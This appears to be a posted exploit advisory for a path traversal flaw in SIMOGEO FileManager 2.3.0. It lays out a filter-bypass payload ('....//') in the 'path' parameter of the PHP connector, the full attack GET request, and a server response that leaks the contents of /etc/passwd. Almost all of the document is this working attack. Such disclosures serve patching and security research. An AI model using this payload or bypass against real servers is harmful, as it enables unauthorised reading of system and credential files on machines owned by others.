SIMOGEO FileManager 2.3.0 Path Traversal
Posted on 12 February 2016
# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability # Date: 2015-12-09 # Exploit Author: HaHwul # Exploit Author Blog: http://www.codeblack.net # Vendor Homepage: https://github.com/simogeo/Filemanager # Software Link: git clone http://github.com/simogeo/Filemanager.git # Version: 2.3.0 # Tested on: Debian [Wheezy] # CVE : none Path Traversal Code http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd Filtering Rules: "../" -> blank Bypass Filtering : ....// -> deleted "../" -> ../ Attack Request GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1 Host: 192.168.0.15 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Response HTTP/1.1 200 OK Date: Tue, 08 Dec 2015 17:18:52 GMT Server: Apache/2.2.16 (Debian) X-Powered-By: PHP/5.3.3-7+squeeze19 Content-Transfer-Encoding: Binary Content-Length: 1383 Content-Disposition: inline; filename="passwd" Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ..snip..